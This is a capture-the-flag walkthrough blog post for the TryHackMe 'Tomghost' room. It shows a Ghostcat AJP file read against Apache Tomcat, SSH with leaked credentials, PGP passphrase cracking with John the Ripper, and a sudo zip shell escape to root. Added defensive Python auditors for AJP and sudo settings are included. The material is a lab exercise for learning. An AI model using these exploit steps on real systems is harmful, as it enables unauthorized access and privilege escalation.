12-15-2022, 07:36 AM
Tomghost “Try Hack Me” Walkthrough (Hacked)
<div>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="160" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-220-1024x160.png" alt="" class="wp-image-981133" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-220-1024x160.png 1024w, https://blog.finxter.com/wp-content/uplo...300x47.png 300w, https://blog.finxter.com/wp-content/uplo...68x120.png 768w, https://blog.finxter.com/wp-content/uplo...36x240.png 1536w, https://blog.finxter.com/wp-content/uplo...ge-220.png 1920w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><a href="https://tryhackme.com/room/tomghost" data-type="URL" data-id="https://tryhackme.com/room/tomghost" target="_blank" rel="noreferrer noopener">TryHackMe Challenge – Tomghost</a></figcaption></figure>
</div>
<p>In this CTF (Capture the Flag) challenge walkthrough, we will be hacking into an Apache Tomcat server using an exploit created by a Chinese developer. </p>
<p>This exploit is available as a standalone Python file and as a Metasploit module. </p>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tomghost-try-hack-me-walkthrough-hacked/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FB4JQCoxZmmU%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<p>In the walkthrough video, I’ll demonstrate both methods of gaining an initial foothold on the box. We will use the trusty hash cracking tool <strong><em>John the Ripper</em></strong> to recover a passphrase from two files found on the target machine. </p>
<p>Logging in as the second user, we can leverage our sudo permission to run the zip binary as root in order to retrieve the root flag.</p>
<p>Please note that this box contains a username with foul language. If you are easily offended by bad words, please don’t continue reading this walkthrough. </p>
<h2>ENUMERATION</h2>
<p>First, let’s export our IPs and enumerate with <code>nmap</code>.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">export myIP=10.6.2.23
export targetIP=10.10.225.99
sudo nmap -Pn -sC -p- -O $targetIP
</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="479" height="223" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-219.png" alt="" class="wp-image-981125" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-219.png 479w, https://blog.finxter.com/wp-content/uplo...00x140.png 300w" sizes="(max-width: 479px) 100vw, 479px" /></figure>
</div>
<p>Next, we look further into the port 8009 service <code>ajp13</code> with some searching on Google. We quickly discover that this is the AJP connector of an Apache Tomcat server, and that it is vulnerable to <a href="https://github.com/00theway/Ghostcat-CNVD-2020-10487" target="_blank" rel="noreferrer noopener">Ghostcat</a> (CNVD-2020-10487). </p>
<h2>INITIAL FOOTHOLD WITH GHOSTCAT</h2>
<p>Using <code>metasploit</code> with the <code>ghostcat</code> module, we can read <code>WEB-INF/web.xml</code> and retrieve the first user’s username and password. Also of interest is port 8080 running an HTTP proxy; this is probably a web page we can look at in a browser. </p>
<p>The other method for retrieving the first username and password is to run the following command to use <code>ajpShooter.py</code> directly without <code>metasploit</code>:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python ajpShooter.py http://10.10.176.124:8080 8009 /WEB-INF/web.xml read

00theway,just for test

[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"1261-1583902632000"
[<] Last-Modified: Wed, 11 Mar 2020 04:57:12 GMT
[<] Content-Type: application/xml
[<] Content-Length: 1261

<?xml version="1.0" encoding="UTF-8"?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements. See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License. You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0"
         metadata-complete="true">
  <display-name>Welcome to Tomcat</display-name>
  <description>
    Welcome to GhostCat
    skyfuck:8730281lkjlkjdqlksalks
  </description>
</web-app>
</pre>
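<p>The foothold above works because the AJP connector on port 8009 is reachable from the network and accepts requests without a shared secret. The following Python script is an added example, not code from this walkthrough or from the Ghostcat project: it audits a Tomcat <code>server.xml</code> for that weak connector setting and shows the hardened form beside it. Both configuration samples are constructed; the attribute names (<code>address</code>, <code>secretRequired</code>, <code>secret</code>) are Tomcat's own.</p>

```python
# Audit a Tomcat server.xml for AJP connectors that are network-reachable or
# unauthenticated. Added example; the two sample configs below are constructed.
import xml.etree.ElementTree as ET

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

# Constructed sample: AJP connector with no address restriction and no secret,
# the setting that makes the Ghostcat file read possible from the network.
EXPOSED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>
"""

# Constructed sample of the corrected connector: loopback only, secret required.
HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" />
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE_WITH_A_RANDOM_SECRET" />
  </Service>
</Server>
"""


def audit_ajp_connectors(server_xml):
    """Return one finding per AJP connector that is reachable from the network
    or accepts requests without a shared secret. An empty list means no issue."""
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        protocol = conn.get("protocol", "HTTP/1.1")
        if "AJP" not in protocol.upper():
            continue  # HTTP/HTTPS connectors are not in scope for Ghostcat
        issues = []
        address = conn.get("address")
        if address is None:
            # Older Tomcat releases bind AJP to all interfaces when no address is set
            issues.append("no address attribute: may listen on all interfaces")
        elif address not in LOOPBACK:
            issues.append("bound to %s, reachable from the network" % address)
        if conn.get("secretRequired", "true").lower() != "true":
            issues.append("secretRequired=false: unauthenticated AJP requests accepted")
        if not conn.get("secret"):
            issues.append("no secret attribute: nothing authenticates AJP clients")
        if issues:
            findings.append({"port": conn.get("port"), "issues": issues})
    return findings


if __name__ == "__main__":
    for label, cfg in (("exposed", EXPOSED_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(label, audit_ajp_connectors(cfg))
```

Run it against a real <code>conf/server.xml</code> by reading the file into <code>audit_ajp_connectors</code>; the hardened sample yields no findings, the exposed one flags port 8009 twice.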
<h2>SSH INTO THE TARGET MACHINE</h2>
<p>Now that we have retrieved the <code>user:password</code>, we can go ahead and SSH into the box.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">ssh [email protected]
Password: 8730281lkjlkjdqlksalks</pre>
<p>During further enumeration, we discovered two files: <code>tryhackme.asc</code> and <code>credential.pgp</code>. These files will probably help us uncover another hidden string. The <code>.asc</code> file holds a passphrase-protected PGP key; once that passphrase is cracked, the key can decrypt the <code>.pgp</code> file.</p>
<p>First, we need to transfer both files to our attacker machine so that we can use John the Ripper to crack the passphrase. We can use <strong>SCP</strong> (secure copy protocol) to transfer the files. </p>
<p>The following commands allow us to uncover the hidden string, which turns out to be another <code>username:password</code> combination.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo scp [email protected]:/home/skyfuck/credential.pgp ~/THM/tomghost/credential.pgp
sudo scp [email protected]:/home/skyfuck/tryhackme.asc ./tomghost/tryhackme.asc
</pre>
<h2>DECRYPTING THE HIDDEN SECRET WITH JOHN THE RIPPER</h2>
<p>On our attacker machine we can run <code>gpg2john</code> (shipped with John the Ripper) to convert the <code>.asc</code> key into a hash file that John can work on, titled “hash”.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">gpg2john tryhackme.asc > hash</pre>
<p>And now we can run John the Ripper against that hash with a wordlist to recover the passphrase protecting the key.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">john --wordlist=/home/kalisurfer/hacking-tools/SecLists/Passwords/Leaked-Databases/rockyou/rockyou.txt hash</pre>
<p>The <code>rockyou.txt</code> file is a leaked database of passwords that is often used in pentesting. Once we have the passphrase, we use the following commands to import the key and decrypt the <code>credential.pgp</code> file.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">gpg --import tryhackme.asc
# run as the same user that imported the key (sudo would use root's separate keyring);
# enter the cracked passphrase when prompted
gpg --decrypt credential.pgp
</pre>
<p>And we have it!</p>
<p>merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j%</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">!!!
THM{GhostCat_1s_so_cr4sy}
!!!
</pre>
<h2>EXPLOITING SUDO PERMISSIONS ON ZIP</h2>
<p>First, we need to switch over to the user merlin with: </p>
<p><code>su merlin</code></p>
<p>We discover with <code>sudo -l</code> that we have sudo permission to run the zip binary. </p>
<p>Over on <a href="https://gtfobins.github.io/" target="_blank" rel="noreferrer noopener">GTFObins</a> we find a privilege escalation vector: zip’s <code>-TT</code> option runs a test command on the archive, so under sudo it spawns a root shell, which lets us retrieve the root flag:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">merlin@ubuntu:/usr/bin$ TF=$(mktemp -u)
merlin@ubuntu:/usr/bin$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# whoami
root
# cd /root
# ls
root.txt ufw
# cat root.txt
THM{Z1P_1S_FAKE}
</pre>
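<p>The escalation above comes down to one over-broad sudo rule: merlin may run <code>zip</code> as root, and zip can execute a command of the caller’s choosing. The following Python script is an added example, not from this walkthrough or from GTFObins: it parses <code>sudo -l</code> output and flags rules that hand root execution of a shell-capable binary to a user. The sample output is constructed, and the binary list is an assumed small subset of the GTFOBins sudo entries.</p>

```python
# Flag sudo rules that let a user run a shell-capable binary as root.
# Added example; the sudo -l output below is constructed.
import re

# Binaries whose documented options can run arbitrary commands (assumed subset
# of the GTFOBins "sudo" list; extend for your environment).
SHELL_ESCAPE_BINARIES = {
    "zip", "tar", "vim", "vi", "find", "less", "more", "awk",
    "python", "python3", "perl", "env", "bash", "sh",
}

# Constructed sample in the shape of `sudo -l` output for the merlin user.
SAMPLE_SUDO_L = """Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
    (root) /usr/bin/systemctl restart tomcat
"""

# "(runas[:group]) [TAG: ...] command[, command...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+)$")


def audit_sudo_l(output):
    """Return findings for rules that run a shell-escape-capable binary (or ALL)
    as root. Each finding records the command and whether NOPASSWD applies."""
    findings = []
    in_rules = False
    for line in output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True  # everything after this header is a rule line
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas_user = m.group("runas").split(":")[0].strip()
        if runas_user not in ("root", "ALL"):
            continue  # rules that run as an unprivileged user are out of scope here
        for cmd in m.group("cmd").split(","):
            parts = cmd.strip().split()
            if not parts:
                continue
            binary = parts[0].rsplit("/", 1)[-1]  # /usr/bin/zip -> zip
            if binary == "ALL" or binary in SHELL_ESCAPE_BINARIES:
                findings.append({
                    "command": cmd.strip(),
                    "nopasswd": "NOPASSWD:" in m.group("tags"),
                    "reason": "%s can execute arbitrary commands as %s" % (binary, runas_user),
                })
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f)
```

On the sample, only the zip rule is reported; the systemctl rule is scoped to one argument and its binary is not in the list, so it passes.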
<p>Thanks for reading/watching my walkthrough.</p>
</div>
https://www.sickgaming.net/blog/2022/12/...gh-hacked/